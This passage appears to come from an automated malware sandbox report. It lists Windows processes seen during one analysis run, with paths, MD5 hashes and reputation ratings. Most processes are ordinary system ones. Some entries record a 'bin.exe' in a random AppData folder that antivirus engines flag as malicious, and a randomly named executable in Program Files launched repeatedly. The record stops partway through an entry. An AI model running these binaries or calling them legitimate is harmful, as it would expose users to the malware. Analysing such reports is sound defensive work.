                                                                                                                                                                        Target ID:2
                                                                                                                                                                        Start time:00:41:03
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:winver
                                                                                                                                                                        Imagebase:0xd00000
                                                                                                                                                                        File size:57'344 bytes
                                                                                                                                                                        MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:3
                                                                                                                                                                        Start time:00:41:03
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                        Imagebase:0x7ff72b770000
                                                                                                                                                                        File size:5'141'208 bytes
                                                                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:00:41:11
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\sihost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:sihost.exe
                                                                                                                                                                        Imagebase:0x7ff796ef0000
                                                                                                                                                                        File size:111'616 bytes
                                                                                                                                                                        MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:5
                                                                                                                                                                        Start time:00:41:11
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:6
                                                                                                                                                                        Start time:00:41:11
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:00:41:12
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\ctfmon.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:ctfmon.exe
                                                                                                                                                                        Imagebase:0x7ff7e3b00000
                                                                                                                                                                        File size:11'264 bytes
                                                                                                                                                                        MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:00:41:12
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:9
                                                                                                                                                                        Start time:00:41:12
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                        Imagebase:0x7ff7da970000
                                                                                                                                                                        File size:793'416 bytes
                                                                                                                                                                        MD5 hash:5CDDF06A40E89358807A2B9506F064D9
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:10
                                                                                                                                                                        Start time:00:41:13
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:11
                                                                                                                                                                        Start time:00:41:14
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                        Imagebase:0x7ff6fdaa0000
                                                                                                                                                                        File size:3'671'400 bytes
                                                                                                                                                                        MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:12
                                                                                                                                                                        Start time:00:41:19
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\E38A1E29\bin.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\E38A1E29\bin.exe"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:116'224 bytes
                                                                                                                                                                        MD5 hash:CB95EC2B6EF058D45AA18CD146471002
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:13
                                                                                                                                                                        Start time:00:41:19
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:17
                                                                                                                                                                        Start time:00:41:27
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:18
                                                                                                                                                                        Start time:00:41:27
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\smartscreen.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\smartscreen.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff7d45b0000
                                                                                                                                                                        File size:2'378'752 bytes
                                                                                                                                                                        MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:19
                                                                                                                                                                        Start time:00:41:27
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\E38A1E29\bin.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\E38A1E29\bin.exe"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:116'224 bytes
                                                                                                                                                                        MD5 hash:CB95EC2B6EF058D45AA18CD146471002
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:20
                                                                                                                                                                        Start time:00:41:28
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:21
                                                                                                                                                                        Start time:00:41:29
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
                                                                                                                                                                        Imagebase:0x7ff794e20000
                                                                                                                                                                        File size:19'232 bytes
                                                                                                                                                                        MD5 hash:F050189D49E17D0D340DE52E9E5B711F
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:22
                                                                                                                                                                        Start time:00:41:30
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:23
                                                                                                                                                                        Start time:00:41:31
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:24
                                                                                                                                                                        Start time:00:41:31
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\ApplicationFrameHost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff7d5d50000
                                                                                                                                                                        File size:78'456 bytes
                                                                                                                                                                        MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:25
                                                                                                                                                                        Start time:00:41:32
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
                                                                                                                                                                        Imagebase:0x7ff63cc40000
                                                                                                                                                                        File size:19'456 bytes
                                                                                                                                                                        MD5 hash:6C44453CD661FC2DB18E4C09C4940399
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:26
                                                                                                                                                                        Start time:00:41:33
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:27
                                                                                                                                                                        Start time:00:41:33
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                                                                                                                        Imagebase:0x7ff614e70000
                                                                                                                                                                        File size:98'104 bytes
                                                                                                                                                                        MD5 hash:3CD3CD85226FCF576DFE9B70B6DA2630
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:28
                                                                                                                                                                        Start time:00:41:38
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff69a060000
                                                                                                                                                                        File size:57'856 bytes
                                                                                                                                                                        MD5 hash:BCE744909EB87F293A85830D02B3D6EB
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:29
                                                                                                                                                                        Start time:00:41:38
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:30
                                                                                                                                                                        Start time:00:41:38
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0x4
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:31
                                                                                                                                                                        Start time:00:41:39
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                        Imagebase:0x7ff70f330000
                                                                                                                                                                        File size:21'312 bytes
                                                                                                                                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:32
                                                                                                                                                                        Start time:00:41:39
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca
                                                                                                                                                                        Imagebase:0x7ff6ec4b0000
                                                                                                                                                                        File size:19'776 bytes
                                                                                                                                                                        MD5 hash:DA7063B17DBB8BBB3015351016868006
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:33
                                                                                                                                                                        Start time:00:41:40
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:34
                                                                                                                                                                        Start time:00:41:40
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:35
                                                                                                                                                                        Start time:00:41:41
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:36
                                                                                                                                                                        Start time:00:41:41
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:37
                                                                                                                                                                        Start time:00:41:41
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:38
                                                                                                                                                                        Start time:00:41:42
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:39
                                                                                                                                                                        Start time:00:41:42
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:40
                                                                                                                                                                        Start time:00:41:42
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:41
                                                                                                                                                                        Start time:00:41:42
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:42
                                                                                                                                                                        Start time:00:41:43
                                                                                                                                                                        Start date:19/12/2023
                                                                                                                                                                        Path:C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe"
                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                        File size:140'800 bytes
